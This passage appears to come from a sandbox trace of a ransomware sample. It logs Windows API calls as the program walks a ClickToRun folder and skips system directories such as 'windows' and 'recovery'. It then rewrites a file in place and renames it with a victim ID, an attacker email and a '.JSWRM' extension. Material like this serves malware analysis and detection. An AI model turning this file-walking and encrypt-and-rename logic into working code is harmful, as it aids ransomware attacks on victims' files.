nFileSizeLow=0x13c4d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVPolicy.dll", cAlternateFileName="APPVPO~1.DLL")) returned 1 [0067.559] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2=".") returned 1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="..") returned 1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="...") returned 1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="windows") returned -1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="recovery") returned -1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="perflogs") returned -1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="documents and settings") returned -1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="system volume information") returned -1 [0067.560] lstrcmpiW (lpString1="AppVPolicy.dll", lpString2="msocache") returned -1 [0067.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPolicy.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPolicy.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVPolicy.dll", lpUsedDefaultChar=0x0) returned 14 [0067.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPolicy.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPolicy.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVPolicy.dll", lpUsedDefaultChar=0x0) returned 14 [0067.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0067.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0067.560] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x7d0d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVScripting.dll", cAlternateFileName="APPVSC~1.DLL")) returned 1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2=".") returned 1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="..") returned 1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="...") returned 1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="windows") returned -1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="recovery") returned -1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="perflogs") returned -1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="documents and settings") returned -1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="system volume information") returned -1 [0067.560] lstrcmpiW (lpString1="AppVScripting.dll", lpString2="msocache") returned -1 [0067.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVScripting.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0067.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVScripting.dll", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVScripting.dll", lpUsedDefaultChar=0x0) returned 17 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVScripting.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVScripting.dll", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVScripting.dll", lpUsedDefaultChar=0x0) returned 17 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0067.561] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x406d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVShNotify.exe", cAlternateFileName="APPVSH~1.EXE")) returned 1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2=".") returned 1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="..") returned 1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="...") returned 1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="windows") returned -1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="recovery") returned -1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="perflogs") returned -1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="documents and settings") returned -1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="system volume information") returned -1 [0067.561] lstrcmpiW (lpString1="AppVShNotify.exe", lpString2="msocache") returned -1 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVShNotify.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0067.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVShNotify.exe", cchWideChar=16, lpMultiByteStr=0x241290, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVShNotify.exe", lpUsedDefaultChar=0x0) returned 16 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVShNotify.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVShNotify.exe", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVShNotify.exe", lpUsedDefaultChar=0x0) returned 16 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0067.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0067.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0067.562] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14115400, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0xc84c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="C2R32.dll", cAlternateFileName="")) returned 1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2=".") returned 1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="..") returned 1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="...") returned 1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="windows") returned -1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="recovery") returned -1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="perflogs") returned -1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="documents and settings") returned -1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="system volume information") returned -1 [0067.562] lstrcmpiW (lpString1="C2R32.dll", lpString2="msocache") returned -1 [0067.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R32.dll", lpUsedDefaultChar=0x0) returned 9 [0067.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R32.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R32.dll", lpUsedDefaultChar=0x0) returned 9 [0067.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0067.562] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb4b54300, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x127260, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="C2R64.dll", cAlternateFileName="")) returned 1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2=".") returned 1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="..") returned 1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="...") returned 1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="windows") returned -1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="recovery") returned -1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="perflogs") returned -1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="documents and settings") returned -1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.562] lstrcmpiW (lpString1="C2R64.dll", lpString2="system volume information") returned -1 [0067.563] lstrcmpiW (lpString1="C2R64.dll", lpString2="msocache") returned -1 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R64.dll", lpUsedDefaultChar=0x0) returned 9 [0067.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R64.dll", lpUsedDefaultChar=0x0) returned 9 [0067.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.563] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8ee04f00, ftLastWriteTime.dwHighDateTime=0x1d0d67f, nFileSizeHigh=0x0, nFileSizeLow=0x1028, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="C2RHeartbeatConfig.xml", cAlternateFileName="C2RHEA~1.XML")) returned 1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2=".") returned 1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="..") returned 1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="...") returned 1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="windows") returned -1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="recovery") returned -1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="perflogs") returned -1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="documents and settings") returned -1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="$RECYCLE.BIN") returned 1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="system volume information") returned -1 [0067.563] lstrcmpiW (lpString1="C2RHeartbeatConfig.xml", lpString2="msocache") returned -1 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RHeartbeatConfig.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RHeartbeatConfig.xml", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RHeartbeatConfig.xml", lpUsedDefaultChar=0x0) returned 22 [0067.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RHeartbeatConfig.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RHeartbeatConfig.xml", cchWideChar=22, lpMultiByteStr=0x241380, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RHeartbeatConfig.xml", lpUsedDefaultChar=0x0) returned 22 [0067.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0067.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0067.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.564] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4136) returned 1 [0067.564] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1020) returned 0x24d1d8 [0067.564] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x1020, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x1020, lpOverlapped=0x0) returned 1 [0067.566] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.566] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x1020, lpOverlapped=0x0) returned 1 [0067.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.566] CloseHandle (hObject=0x454) returned 1 [0067.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0067.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0067.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0067.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0067.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x1f19f0 [0067.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0067.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.567] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.569] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb3841600, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4b8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="C2RUI.en-us.dll", cAlternateFileName="C2RUIE~1.DLL")) returned 1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2=".") returned 1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="..") returned 1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="...") returned 1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="windows") returned -1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="recovery") returned -1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="perflogs") returned -1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="documents and settings") returned -1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="system volume information") returned -1 [0067.569] lstrcmpiW (lpString1="C2RUI.en-us.dll", lpString2="msocache") returned -1 [0067.569] RtlAllocateHeap 